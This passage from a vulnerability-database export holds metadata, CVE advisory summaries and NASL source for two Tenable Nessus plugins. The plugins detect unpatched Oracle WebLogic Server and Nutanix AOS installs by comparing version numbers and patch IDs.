(CVE-2018-15756)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-22T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities (Jul 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7103", "CVE-2016-71030", "CVE-2018-15756", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-2824", "CVE-2019-2827", "CVE-2019-2856"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2019.NASL", "href": "https://www.tenable.com/plugins/nessus/126915", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(126915);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\n \"CVE-2016-7103\",\n \"CVE-2018-15756\",\n \"CVE-2019-2725\",\n \"CVE-2019-2729\",\n \"CVE-2019-2824\",\n \"CVE-2019-2827\",\n \"CVE-2019-2856\"\n );\n script_bugtraq_id(107944);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0242\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0455\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0463\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (Jul 2019 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities:\n\n - An unspecified vulnerability allows a remote unauthenticated \n attacker with network access to compromise and takeover the \n StorageTek Tape Analytics SW Tool. (CVE-2019-2725) (CVE-2019-2729)\n\n - An unspecified vulnerability allows a remote unauthenticated \n attacker with network access to compromise and takeover the \n Tape Virtual Storage Manager GUI. (CVE-2019-2725)\n\n - An unspecified vulnerability in the WLS Core Component allows an \n authenticated low privileged attacker with network \n access via HTTP to compromise Oracle WebLogic Server, resulting \n in unauthorized update, insert or delete access to Oracle \n WebLogic Server accessible data. (CVE-2019-2824) (CVE-2019-2827)\n\n - An unspecified vulnerability in the jQuery Component allows an \n authenticated low privileged attacker with network \n access via HTTP to compromise Oracle WebLogic Server, resulting \n in unauthorized update, insert or delete access to Oracle \n WebLogic Server accessible data. Successful attacks require\n human interaction from actions from another Weblogic user.\n (CVE-2016-71030)\n\n - An unspecified vulnerability in the Application Container - JavaEE\n Component of Oracle WebLogic Server allows an unauthenticated\n attacker with network access via T3 to compromise Oracle WebLogic\n Server. A successful attack of this vulnerability could result in\n takeover of Oracle WebLogic Server. (CVE-2019-2856)\n \n - An unspecified vulnerability in the Sample apps (Spring Framework)\n Component of Oracle WebLogic Server allows an unauthenticated\n attacker with network access via HTTP to compromise Oracle WebLogic\n Server. A successful attack of this vulnerability could result in\n unauthorized ability to cause a hang or frequently repeatable crash\n (complete DOS) of Oracle WebLogic Server. (CVE-2018-15756)\");\n # https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9aa2b901\");\n # https://www.oracle.com/technetwork/security-advisory/cpujul2019verbose-5072838.html#FMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?09b101ce\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2019 Oracle\nCritical Patch Update advisory.\n\nRefer to Oracle for any additional patch instructions or\nmitigation options.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-2729\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Oracle WebLogic Server Web Services RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Server Deserialization RCE - AsyncResponseService');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\ninclude('obj.inc');\ninclude('spad_log_func.inc');\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\n\nspad_log(message:\"checking version [\" + version + \"]\");\n# individual security patches\nif (version =~ \"^12\\.2\\.1\\.3($|[^0-9])\")\n{\n fix_ver = \"12.2.1.3.190522\";\n fix = make_list(\"29814665\");\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = \"12.1.3.0.190716\";\n fix = make_list(\"29633448\");\n}\nelse if (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = \"10.3.6.0.190716\";\n fix = make_list(\"MXLE\"); # patchid is obtained from the readme and 10.3.6.x assets are different\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n\nspad_log(message:\"checking fix [\" + obj_rep(fix) + \"]\");\nPATCHED=FALSE;\n\n# Iterate over the list of patches and check the install for the patchID\nforeach id (fix)\n{\n spad_log(message:\"Checking fix id: [\" + id +\"]\");\n if (install[id])\n {\n PATCHED=TRUE;\n break;\n }\n}\n\nVULN=FALSE;\nif (ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n VULN=TRUE;\n\nif (PATCHED || !VULN)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n\nos = get_kb_item_or_exit(\"Host/OS\");\nif ('windows' >< tolower(os))\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n}\nelse port = 0;\n\nreport =\n '\\n Oracle Home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Fixes : ' + join(sep:\", \", fix);\n\nsecurity_report_v4(extra:report, severity:SECURITY_HOLE, port:port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-23T21:15:32", "description": "The version of AOS installed on the remote host is prior to 6.6. It is, therefore, affected by multiple vulnerabilities as referenced in the NXSA-AOS-6.6 advisory.\n\n - Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack. (CVE-2018-1270)\n\n - zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches. (CVE-2018-25032)\n\n - http.client in Python 3.x before 3.5.10, 3.6.x before 3.6.12, 3.7.x before 3.7.9, and 3.8.x before 3.8.5 allows CRLF injection if the attacker controls the HTTP request method, as demonstrated by inserting CR and LF control characters in the first argument of HTTPConnection.request. (CVE-2020-26116)\n\n - urllib3 before 1.25.9 allows CRLF injection if the attacker controls the HTTP request method, as demonstrated by inserting CR and LF control characters in the first argument of putrequest(). NOTE: this is similar to CVE-2020-26116. (CVE-2020-26137)\n\n - An issue was discovered in SaltStack Salt before 3003.3. A user who has control of the source, and source_hash URLs can gain full file system access as root on a salt minion. (CVE-2021-21996)\n\n - Python 3.x through 3.9.1 has a buffer overflow in PyCArg_repr in _ctypes/callproc.c, which may lead to remote code execution in certain Python applications that accept floating-point numbers as untrusted input, as demonstrated by a 1e300 argument to c_double.from_param. This occurs because sprintf is used unsafely. (CVE-2021-3177)\n\n - In Expat (aka libexpat) before 2.4.3, a left shift by 29 (or more) places in the storeAtts function in xmlparse.c can lead to realloc misbehavior (e.g., allocating too few bytes, or only freeing memory).\n (CVE-2021-45960)\n\n - In doProlog in xmlparse.c in Expat (aka libexpat) before 2.4.3, an integer overflow exists for m_groupSize. (CVE-2021-46143)\n\n - The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self- signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). (CVE-2022-0778)\n\n - An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system. (CVE-2022-1271)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs.\n (CVE-2022-21426)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. (CVE-2022-21434)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. (CVE-2022-21443)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 17.0.2 and 18; Oracle GraalVM Enterprise Edition: 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. (CVE-2022-21449)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. (CVE-2022-21476)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs.\n (CVE-2022-21496)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 7u343, 8u333, 11.0.15.1, 17.0.3.1, 18.0.1.1; Oracle GraalVM Enterprise Edition: 20.3.6, 21.3.2 and 22.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs.\n (CVE-2022-21540)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 7u343, 8u333, 11.0.15.1, 17.0.3.1, 18.0.1.1; Oracle GraalVM Enterprise Edition: 20.3.6, 21.3.2 and 22.1.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. (CVE-2022-21541)\n\n - Apache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling (CVE-2022-22720)\n\n - addBinding in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22822)\n\n - build_model in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22823)\n\n - defineAttribute in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.\n (CVE-2022-22824)\n\n - lookup in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22825)\n\n - nextScaffoldPart in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.\n (CVE-2022-22826)\n\n - storeAtts in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22827)\n\n - Expat (aka libexpat) before 2.4.4 has a signed integer overflow in XML_GetBuffer, for configurations with a nonzero XML_CONTEXT_BYTES. (CVE-2022-23852)\n\n - xmltok_impl.c in Expat (aka libexpat) before 2.4.5 lacks certain validation of encoding, such as checks for whether a UTF-8 character is valid in a certain context. (CVE-2022-25235)\n\n - xmlparse.c in Expat (aka libexpat) before 2.4.5 allows attackers to insert namespace-separator characters into namespace URIs. (CVE-2022-25236)\n\n - A use-after-free vulnerability was found in systemd. This issue occurs due to the on_stream_io() function and dns_stream_complete() function in 'resolved-dns-stream.c' not incrementing the reference counting for the DnsStream object. Therefore, other functions and callbacks called can dereference the DNSStream object, causing the use-after-free when the reference is still used later. (CVE-2022-2526)\n\n - In Expat (aka libexpat) before 2.4.5, there is an integer overflow in storeRawNames. (CVE-2022-25315)\n\n - If a web application sends a WebSocket message concurrently with the WebSocket connection closing when running on Apache Tomcat 8.5.0 to 8.5.75 or Apache Tomcat 9.0.0.M1 to 9.0.20, it is possible that the application will continue to use the socket after it has been closed. The error handling triggered in this case could cause the a pooled object to be placed in the pool twice. This could result in subsequent connections using the same object concurrently which could result in data being returned to the wrong use and/or other errors. (CVE-2022-25762)\n\n - An issue was discovered in rsync before 3.2.5 that allows malicious remote servers to write arbitrary files inside the directories of connecting peers. The server chooses which files/directories are sent to the client. However, the rsync client performs insufficient validation of file names. A malicious rsync server (or Man-in-The-Middle attacker) can overwrite arbitrary files in the rsync client target directory and subdirectories (for example, overwrite the .ssh/authorized_keys file). (CVE-2022-29154)\n\n - The documentation of Apache Tomcat 10.1.0-M1 to 10.1.0-M14, 10.0.0-M1 to 10.0.20, 9.0.13 to 9.0.62 and 8.5.38 to 8.5.78 for the EncryptInterceptor incorrectly stated it enabled Tomcat clustering to run over an untrusted network. This was not correct. While the EncryptInterceptor does provide confidentiality and integrity protection, it does not protect against all risks associated with running over any untrusted network, particularly DoS risks. (CVE-2022-29885)\n\n - VMware Tools (12.0.0, 11.x.y and 10.x.y) contains a local privilege escalation vulnerability. A malicious actor with local non-administrative access to the Guest OS can escalate privileges as a root user in the virtual machine. (CVE-2022-31676)\n\n - The Apache Xalan Java XSLT library is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode. The Apache Xalan Java project is dormant and in the process of being retired. No future releases of Apache Xalan Java to address this issue are expected. Note: Java runtimes (such as OpenJDK) include repackaged copies of Xalan. (CVE-2022-34169)\n\n - In Apache Tomcat 10.1.0-M1 to 10.1.0-M16, 10.0.0-M1 to 10.0.22, 9.0.30 to 9.0.64 and 8.5.50 to 8.5.81 the Form authentication example in the examples web application displayed user provided data without filtering, exposing a XSS vulnerability. (CVE-2022-34305)\n\n - Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is ${prefix:name}, where prefix is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - script - execute expressions using the JVM script execution engine (javax.script) - dns - resolve dns records - url - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default. (CVE-2022-42889)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-24T00:00:00", "type": "nessus", "title": "Nutanix AOS : Multiple Vulnerabilities (NXSA-AOS-6.6)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270", "CVE-2018-25032", "CVE-2020-26116", "CVE-2020-26137", "CVE-2021-21996", "CVE-2021-3177", "CVE-2021-45960", "CVE-2021-46143", "CVE-2022-0778", "CVE-2022-1271", "CVE-2022-21426", "CVE-2022-21434", "CVE-2022-21443", "CVE-2022-21449", "CVE-2022-21476", "CVE-2022-21496", "CVE-2022-21540", "CVE-2022-21541", "CVE-2022-22720", "CVE-2022-22822", "CVE-2022-22823", "CVE-2022-22824", "CVE-2022-22825", "CVE-2022-22826", "CVE-2022-22827", "CVE-2022-23852", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-2526", "CVE-2022-25315", "CVE-2022-25762", "CVE-2022-29154", "CVE-2022-29885", "CVE-2022-31676", "CVE-2022-34169", "CVE-2022-34305", "CVE-2022-42889"], "modified": "2023-02-23T00:00:00", "cpe": ["cpe:/o:nutanix:aos"], "id": "NUTANIX_NXSA-AOS-6_6.NASL", "href": "https://www.tenable.com/plugins/nessus/170557", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(170557);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/23\");\n\n script_cve_id(\n \"CVE-2018-1270\",\n \"CVE-2018-25032\",\n \"CVE-2020-26116\",\n \"CVE-2020-26137\",\n \"CVE-2021-3177\",\n \"CVE-2021-21996\",\n \"CVE-2021-45960\",\n \"CVE-2021-46143\",\n \"CVE-2022-0778\",\n \"CVE-2022-1271\",\n \"CVE-2022-2526\",\n \"CVE-2022-21426\",\n \"CVE-2022-21434\",\n \"CVE-2022-21443\",\n \"CVE-2022-21449\",\n \"CVE-2022-21476\",\n \"CVE-2022-21496\",\n \"CVE-2022-21540\",\n \"CVE-2022-21541\",\n \"CVE-2022-22720\",\n \"CVE-2022-22822\",\n \"CVE-2022-22823\",\n \"CVE-2022-22824\",\n \"CVE-2022-22825\",\n \"CVE-2022-22826\",\n \"CVE-2022-22827\",\n \"CVE-2022-23852\",\n \"CVE-2022-25235\",\n \"CVE-2022-25236\",\n \"CVE-2022-25315\",\n \"CVE-2022-25762\",\n \"CVE-2022-29154\",\n \"CVE-2022-29885\",\n \"CVE-2022-31676\",\n \"CVE-2022-34169\",\n \"CVE-2022-34305\",\n \"CVE-2022-42889\"\n );\n\n script_name(english:\"Nutanix AOS : Multiple Vulnerabilities (NXSA-AOS-6.6)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Nutanix AOS host is affected by multiple vulnerabilities .\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of AOS installed on the remote host is prior to 6.6. It is, therefore, affected by multiple vulnerabilities\nas referenced in the NXSA-AOS-6.6 advisory.\n\n - Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported\n versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP\n broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the\n broker that can lead to a remote code execution attack. (CVE-2018-1270)\n\n - zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many\n distant matches. (CVE-2018-25032)\n\n - http.client in Python 3.x before 3.5.10, 3.6.x before 3.6.12, 3.7.x before 3.7.9, and 3.8.x before 3.8.5\n allows CRLF injection if the attacker controls the HTTP request method, as demonstrated by inserting CR\n and LF control characters in the first argument of HTTPConnection.request. (CVE-2020-26116)\n\n - urllib3 before 1.25.9 allows CRLF injection if the attacker controls the HTTP request method, as\n demonstrated by inserting CR and LF control characters in the first argument of putrequest(). NOTE: this\n is similar to CVE-2020-26116. (CVE-2020-26137)\n\n - An issue was discovered in SaltStack Salt before 3003.3. A user who has control of the source, and\n source_hash URLs can gain full file system access as root on a salt minion. (CVE-2021-21996)\n\n - Python 3.x through 3.9.1 has a buffer overflow in PyCArg_repr in _ctypes/callproc.c, which may lead to\n remote code execution in certain Python applications that accept floating-point numbers as untrusted\n input, as demonstrated by a 1e300 argument to c_double.from_param. This occurs because sprintf is used\n unsafely. (CVE-2021-3177)\n\n - In Expat (aka libexpat) before 2.4.3, a left shift by 29 (or more) places in the storeAtts function in\n xmlparse.c can lead to realloc misbehavior (e.g., allocating too few bytes, or only freeing memory).\n (CVE-2021-45960)\n\n - In doProlog in xmlparse.c in Expat (aka libexpat) before 2.4.3, an integer overflow exists for\n m_groupSize. (CVE-2021-46143)\n\n - The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop\n forever for non-prime moduli. Internally this function is used when parsing certificates that contain\n elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point\n encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has\n invalid explicit curve parameters. Since certificate parsing happens prior to verification of the\n certificate signature, any process that parses an externally supplied certificate may thus be subject to a\n denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they\n can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients\n consuming server certificates - TLS servers 